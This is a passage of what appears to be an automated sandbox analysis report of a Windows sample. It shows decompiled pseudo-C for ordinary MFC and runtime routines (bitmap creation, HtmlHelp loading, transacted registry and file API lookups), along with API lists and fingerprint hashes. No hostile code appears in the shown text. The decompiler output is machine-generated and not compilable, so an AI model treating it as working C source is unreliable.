      						_v32 = _t56;
      						_v16 = 0;
      						_v12 = _t62;
      						if(E009AFBA4(_t56, _t58, 0, _t62, _t71) == 0) {
      							E009BA563(_t58);
      						}
      					}
      					return _t62;
      				}
      			}

      APIs
      • __snwprintf_s.LIBCMT ref: 009AFC7D
      • __snwprintf_s.LIBCMT ref: 009AFCAF
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      Strings
      Yara matches
      Similarity
      • API ID: __snwprintf_s$__getptd_noexit
      • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
      • API String ID: 101746997-2801496823
      • Opcode ID: 368503709f88e672bb5578f1f944c1304e91028ddb01340f3df3abf1f8c49384
      • Instruction ID: 79e47112adfd36590b4c6bb27834e12e2c343a249a3bb6c60fa499467f513a4c
      • Opcode Fuzzy Hash: 368503709f88e672bb5578f1f944c1304e91028ddb01340f3df3abf1f8c49384
      • Instruction Fuzzy Hash: AE314171D00208AFCB51EFA5C941ADE7BB9EF5A360F108426F955A7251E7348E10CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 79%
      			E009BE955(intOrPtr __ebx, struct HDC__* _a4) {
      				signed int _v8;
      				void _v40;
      				unsigned int _v98;
      				char _v99;
      				char _v100;
      				unsigned int _v102;
      				char _v103;
      				char _v104;
      				struct tagBITMAPINFOHEADER _v144;
      				void* __edi;
      				void* __esi;
      				signed int _t24;
      				unsigned int _t30;
      				unsigned int _t31;
      				signed int _t32;
      				struct HBITMAP__* _t36;
      				intOrPtr _t55;
      				struct HDC__* _t57;
      				intOrPtr _t58;
      				intOrPtr _t60;
      				intOrPtr _t61;
      				signed int _t63;
      				signed int _t65;
      
      				_t63 = _t65;
      				_t24 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t24 ^ _t63;
      				_t57 = _a4;
      				E00AAB3F0( &_v144, 0, 0x68);
      				_v144.biCompression = _v144.biCompression & 0x00000000;
      				_v144.biPlanes = 1;
      				_v144.biBitCount = 1;
      				_t30 =  *0xd0fdc4; // 0xf0f0f0
      				_v104 = _t30 >> 0x10;
      				_t60 = 8;
      				_v144.biSize = 0x28;
      				_v144.biWidth = _t60;
      				_v144.biHeight = _t60;
      				_v103 = _t30 >> 8;
      				_v102 = _t30;
      				_t31 = GetSysColor(0x14);
      				_v100 = _t31 >> 0x10;
      				_v98 = _t31;
      				_v99 = _t31 >> 8;
      				_t32 = 0;
      				do {
      					asm("sbb ecx, ecx");
      					 *((intOrPtr*)(_t63 + _t32 * 4 - 0x24)) = ( ~(_t32 & 0x00000001) & 0x5554aaab) + 0x5555aaaa;
      					_t32 = _t32 + 1;
      				} while (_t32 < _t60);
      				_t36 = CreateDIBitmap(_t57,  &_v144, 4,  &_v40,  &_v144, 0);
      				_pop(_t58);
      				_pop(_t61);
      				return E00AAB46A(_t36, __ebx, _v8 ^ _t63, _t55, _t58, _t61);
      			}
      0x009be958
      0x009be960
      0x009be967
      0x009be96c
      0x009be97a
      0x009be97f
      0x009be986
      0x009be98a
      0x009be98e
      0x009be99d
      0x009be9a0
      0x009be9a8
      0x009be9b2
      0x009be9b8
      0x009be9be
      0x009be9c1
      0x009be9c4
      0x009be9cf
      0x009be9d7
      0x009be9da
      0x009be9dd
      0x009be9df
      0x009be9e9
      0x009be9f7
      0x009be9fb
      0x009be9fc
      0x009bea17
      0x009bea20
      0x009bea23
      0x009bea2a

      APIs
      • _memset.LIBCMT ref: 009BE97A
      • GetSysColor.USER32(00000014), ref: 009BE9C4
      • CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 009BEA17
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: BitmapColorCreate_memset
      • String ID: (
      • API String ID: 3930187609-3887548279
      • Opcode ID: 2e6cc2f4499948f462461c02b601f657505ba951d2384b2d2f79017b74379c17
      • Instruction ID: b3f119a399d22b3e61e8488d4234887028b5288991032cef8db1430257cb4a8b
      • Opcode Fuzzy Hash: 2e6cc2f4499948f462461c02b601f657505ba951d2384b2d2f79017b74379c17
      • Instruction Fuzzy Hash: A821F531A11258DFDB04CBB8CD16BEDBBF8AB55700F00846EE646EB281DB355A48CB70
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 89%
      			E009AE2AD(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
      				void* __esi;
      				void* __ebp;
      				struct HINSTANCE__* _t16;
      				_Unknown_base(*)()* _t17;
      				void* _t25;
      				void* _t26;
      				void* _t27;
      
      				_t27 = __eflags;
      				E009C2A0C(0xc);
      				_push(E009AD4C4);
      				_t26 = E009BC8C9(__ebx, 0xd0fb68, __edi, _t25, _t27);
      				if(_t26 == 0) {
      					E009B8782(0xd0fb68);
      				}
      				_t29 =  *(_t26 + 8);
      				if( *(_t26 + 8) != 0) {
      					L7:
      					E009C2A7E(0xc);
      					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
      				} else {
      					_push(L"hhctrl.ocx");
      					_t16 = E009AB76B(0xd0fb68, _t26, _t29);
      					 *(_t26 + 4) = _t16;
      					if(_t16 != 0) {
      						_t17 = GetProcAddress(_t16, "HtmlHelpA");
      						 *(_t26 + 8) = _t17;
      						__eflags = _t17;
      						if(_t17 != 0) {
      							goto L7;
      						}
      						FreeLibrary( *(_t26 + 4));
      						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
      					}
      					return 0;
      				}
      			}
      0x009ae2ad
      0x009ae2b5
      0x009ae2ba
      0x009ae2c9
      0x009ae2cd
      0x009ae2cf
      0x009ae2cf
      0x009ae2d4
      0x009ae2d8
      0x009ae312
      0x009ae314
      0x00000000
      0x009ae2da
      0x009ae2da
      0x009ae2df
      0x009ae2e5
      0x009ae2ea
      0x009ae2f6
      0x009ae2fc
      0x009ae2ff
      0x009ae301
      0x00000000
      0x00000000
      0x009ae306
      0x009ae30c
      0x009ae30c
      0x00000000
      0x009ae2ec

      APIs
        • Part of subcall function 009C2A0C: EnterCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A46
        • Part of subcall function 009C2A0C: InitializeCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A58
        • Part of subcall function 009C2A0C: LeaveCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A65
        • Part of subcall function 009C2A0C: EnterCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A75
        • Part of subcall function 009BC8C9: __EH_prolog3_catch.LIBCMT ref: 009BC8D0
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 009AE2F6
      • FreeLibrary.KERNEL32(?), ref: 009AE306
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
      • String ID: HtmlHelpA$hhctrl.ocx
      • API String ID: 3274081130-63838506
      • Opcode ID: b0f436a2b2c6ee6390c93cc650be83e42c48fcca7fb0e055a5255a0400e65452
      • Instruction ID: d42a18e05590ca883acd5dbef18611775e39433b7e843cb113c4f60043f41d52
      • Opcode Fuzzy Hash: b0f436a2b2c6ee6390c93cc650be83e42c48fcca7fb0e055a5255a0400e65452
      • Instruction Fuzzy Hash: 3201F931540706BBDF216FA5CD06F5B3B98EF85761F00C829F45B96591CF74D810A7A1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 83%
      			E009BBA6E(struct HWND__* _a4, intOrPtr _a8) {
      				signed int _v8;
      				char _v20;
      				void* __esi;
      				signed int _t7;
      				int _t16;
      				intOrPtr _t19;
      				intOrPtr _t22;
      				intOrPtr _t23;
      				struct HWND__* _t24;
      				signed int _t25;
      
      				_t7 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t7 ^ _t25;
      				_t24 = _a4;
      				if(_t24 != 0) {
      					if((GetWindowLongA(_t24, 0xfffffff0) & 0x0000000f) != _a8) {
      						goto L1;
      					} else {
      						GetClassNameA(_t24,  &_v20, 0xa);
      						_t16 = CompareStringA(0x409, 1,  &_v20, 0xffffffff, "combobox", 0xffffffff);
      						asm("sbb eax, eax");
      						_t11 =  ~(_t16 - 2) + 1;
      					}
      				} else {
      					L1:
      					_t11 = 0;
      				}
      				return E00AAB46A(_t11, _t19, _v8 ^ _t25, _t22, _t23, _t24);
      			}
      0x009bba76
      0x009bba7d
      0x009bba81
      0x009bba86
      0x009bba9b
      0x00000000
      0x009bba9d
      0x009bbaa4
      0x009bbabe
      0x009bbac9
      0x009bbacb
      0x009bbacb
      0x009bba88
      0x009bba88
      0x009bba88
      0x009bba88
      0x009bbad8

      APIs
      • GetWindowLongA.USER32 ref: 009BBA8F
      • GetClassNameA.USER32(?,?,0000000A), ref: 009BBAA4
      • CompareStringA.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 009BBABE
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ClassCompareLongNameStringWindow
      • String ID: combobox
      • API String ID: 1414938635-2240613097
      • Opcode ID: e1b4af80d3843d9474e688c35e6c7b116fc5e388f6decba31b540fc7ca56febf
      • Instruction ID: 835dae80c4abd8bd70850a98b02f6ca1e23c75a6bf7ac1f4e0a16a1de24a8eb8
      • Opcode Fuzzy Hash: e1b4af80d3843d9474e688c35e6c7b116fc5e388f6decba31b540fc7ca56febf
      • Instruction Fuzzy Hash: BEF0F432A512287BCB00EB68CC05EBE73A8EB05730B500705F432E71C1DB709A018695
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 009B32CD
      • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 009B32DD
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: Advapi32.dll$RegCreateKeyTransactedA
      • API String ID: 1646373207-1184998024
      • Opcode ID: 4419f869cc25c8f822de731951072a16ddb26115abf1c6dfc1adaa60b1ff2de7
      • Instruction ID: e64e1ab9d56489fc611f702a2da16c5404c89d93da626d5dc29161398fcd9dcb
      • Opcode Fuzzy Hash: 4419f869cc25c8f822de731951072a16ddb26115abf1c6dfc1adaa60b1ff2de7
      • Instruction Fuzzy Hash: 96F03C32140209FBCF119FD4DD04BDA7BA9FB08761F448426FA0695060CB76D561EBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 18%
      			E009B39AA(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
      				struct HINSTANCE__* _t7;
      				_Unknown_base(*)()* _t8;
      				intOrPtr* _t12;
      
      				_t12 = __ecx;
      				if( *__ecx == 0) {
      					if( *((intOrPtr*)(__ecx + 4)) == 0) {
      						L6:
      						return 1;
      					}
      					return RegDeleteKeyA();
      				}
      				_t7 = GetModuleHandleA("Advapi32.dll");
      				if(_t7 == 0) {
      					goto L6;
      				}
      				_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedA");
      				if(_t8 == 0) {
      					goto L6;
      				}
      				return  *_t8(_a4, _a8, 0, 0,  *_t12, 0);
      			}
      0x009b39b1
      0x009b39b7
      0x009b39ea
      0x009b39f5
      0x00000000
      0x009b39f7
      0x009b39ef
      0x009b39ef
      0x009b39be
      0x009b39c6
      0x00000000
      0x00000000
      0x009b39ce
      0x009b39d6
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 009B39BE
      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 009B39CE
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: Advapi32.dll$RegDeleteKeyTransactedA
      • API String ID: 1646373207-1972538232
      • Opcode ID: 5e10baecc21a64072e7c39da2a951ec4b1787c89bc9814e0a7019c1bbdbf7eca
      • Instruction ID: d205a6004d8bd5baa9c4816a359457ab9ce9bffe6ea4b0980e1fecdf3bd0af74
      • Opcode Fuzzy Hash: 5e10baecc21a64072e7c39da2a951ec4b1787c89bc9814e0a7019c1bbdbf7eca
      • Instruction Fuzzy Hash: 97F0A733240500FB87319B9AAD09CE7BB6DEBC1B71324CA37F056C1010D6B29942D660
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 009B3274
      • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 009B3284
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: Advapi32.dll$RegOpenKeyTransactedA
      • API String ID: 1646373207-496252237
      • Opcode ID: fc1783e652375edcb25c2a3eeb9be17d0bac35f6f64a417befde96cfeb3e56d9
      • Instruction ID: c97ee5db1b260d6ab81304a8e964db268d112711ca9f0eac0c6c1b7ae0319263
      • Opcode Fuzzy Hash: fc1783e652375edcb25c2a3eeb9be17d0bac35f6f64a417befde96cfeb3e56d9
      • Instruction Fuzzy Hash: BFF0B432140204BBCB118FE4EE04BD63B98EB04761F048426FA2380060D771C561DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 18%
      			E009C8488(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
      				struct HINSTANCE__* _t6;
      				_Unknown_base(*)()* _t7;
      				intOrPtr* _t10;
      
      				_t10 = __ecx;
      				if( *__ecx == 0) {
      					if( *((intOrPtr*)(__ecx + 4)) == 0) {
      						L6:
      						return 0;
      					}
      					return MoveFileA();
      				}
      				_t6 = GetModuleHandleA("kernel32.dll");
      				if(_t6 == 0) {
      					goto L6;
      				}
      				_t7 = GetProcAddress(_t6, "MoveFileTransactedA");
      				if(_t7 == 0) {
      					goto L6;
      				}
      				return  *_t7(_a4, _a8, 0, 0, 2,  *_t10);
      			}
      0x009c848e
      0x009c8493
      0x009c84ca
      0x009c84d4
      0x00000000
      0x009c84d4
      0x009c84ce
      0x009c84ce
      0x009c849a
      0x009c84a2
      0x00000000
      0x00000000
      0x009c84aa
      0x009c84b2
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,009C872A,?,?,?,009B73AB,?,00000010,00000000,00000010,00000000), ref: 009C849A
      • GetProcAddress.KERNEL32(00000000,MoveFileTransactedA), ref: 009C84AA
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: MoveFileTransactedA$kernel32.dll
      • API String ID: 1646373207-3123790474
      • Opcode ID: 93944e7adeb248e91cd365c1b87b07d3f2a0ccd00d0ac2337398e6c595e1f99e
      • Instruction ID: f8067b87049fe33f68ae2f0da2f9491dc83eb90e99830de6cad65b499af883f0
      • Opcode Fuzzy Hash: 93944e7adeb248e91cd365c1b87b07d3f2a0ccd00d0ac2337398e6c595e1f99e
      • Instruction Fuzzy Hash: C5F0A031A40206FAE7245FA5DC09F93779CAB04B51F05C42FB542A54F0DBB5C840CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,00001000,?,009D2E8C,?,00000000,?,00001022,?,00000000,?,?), ref: 009D2C63
      • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedA), ref: 009D2C73
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: GetFileAttributesTransactedA$kernel32.dll
      • API String ID: 1646373207-3426858862
      • Opcode ID: 0350fd152550a3e727b52f2b851325a697b2255e1cf52dba38ed3e30c0dc1378
      • Instruction ID: 1fdde9edbf006c687004460ace3b1c128abe3a2ad9a7d26a1f9744c4e029d0b4
      • Opcode Fuzzy Hash: 0350fd152550a3e727b52f2b851325a697b2255e1cf52dba38ed3e30c0dc1378
      • Instruction Fuzzy Hash: 7AF08C31194205EBCB205FB49D08B9ABB98FB24762F04C8ABA88681260C7758891DA60
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 37%
      			E009C843E(intOrPtr* __ecx, intOrPtr _a4) {
      				struct HINSTANCE__* _t5;
      				_Unknown_base(*)()* _t6;
      				intOrPtr* _t9;
      
      				_t9 = __ecx;
      				if( *__ecx == 0) {
      					if( *((intOrPtr*)(__ecx + 4)) == 0) {
      						L6:
      						return 0;
      					}
      					return DeleteFileA();
      				}
      				_t5 = GetModuleHandleA("kernel32.dll");
      				if(_t5 == 0) {
      					goto L6;
      				}
      				_t6 = GetProcAddress(_t5, "DeleteFileTransactedA");
      				if(_t6 == 0) {
      					goto L6;
      				}
      				return  *_t6(_a4,  *_t9);
      			}
      0x009c8444
      0x009c8449
      0x009c8477
      0x009c8481
      0x00000000
      0x009c8481
      0x009c847b
      0x009c847b
      0x009c8450
      0x009c8458
      0x00000000
      0x00000000
      0x009c8460
      0x009c8468
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,009C875D,?,?,009B7354,?,00000000), ref: 009C8450
      • GetProcAddress.KERNEL32(00000000,DeleteFileTransactedA), ref: 009C8460
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: DeleteFileTransactedA$kernel32.dll
      • API String ID: 1646373207-1808990283
      • Opcode ID: 31b1e6190288988b9b4f1cd96c161d07756a7dfd822ba9f22534114c6323692e
      • Instruction ID: 2265b9371e15744ccb7e08dccabc9ddeba8631bede5c6b8ee6cc2dbf228d49fe
      • Opcode Fuzzy Hash: 31b1e6190288988b9b4f1cd96c161d07756a7dfd822ba9f22534114c6323692e
      • Instruction Fuzzy Hash: 58E06531940215EBC7245BE59C08F53779DEB40791F08883BE442C1160DF758883C661
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 96%
      			E00AAC4C3(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
      				signed int _v8;
      				signed int _v12;
      				signed int _v16;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t56;
      				signed int _t60;
      				void* _t65;
      				signed int _t66;
      				signed int _t69;
      				signed int _t71;
      				signed int _t72;
      				signed int _t74;
      				signed int _t75;
      				signed int _t78;
      				signed int _t79;
      				signed int _t81;
      				signed int _t85;
      				signed int _t92;
      				signed int _t93;
      				signed int _t94;
      				signed int _t95;
      				intOrPtr* _t96;
      				void* _t97;
      
      				_t92 = _a8;
      				if(_t92 == 0 || _a12 == 0) {
      					L4:
      					return 0;
      				} else {
      					_t96 = _a16;
      					_t100 = _t96;
      					if(_t96 != 0) {
      						_t79 = _a4;
      						__eflags = _t79;
      						if(__eflags == 0) {
      							goto L3;
      						}
      						_t60 = _t56 | 0xffffffff;
      						_t88 = _t60 % _t92;
      						__eflags = _a12 - _t60 / _t92;
      						if(__eflags > 0) {
      							goto L3;
      						}
      						_t93 = _t92 * _a12;
      						__eflags =  *(_t96 + 0xc) & 0x0000010c;
      						_v8 = _t79;
      						_v16 = _t93;
      						_t78 = _t93;
      						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
      							_v12 = 0x1000;
      						} else {
      							_v12 =  *(_t96 + 0x18);
      						}
      						__eflags = _t93;
      						if(_t93 == 0) {
      							L32:
      							return _a12;
      						} else {
      							do {
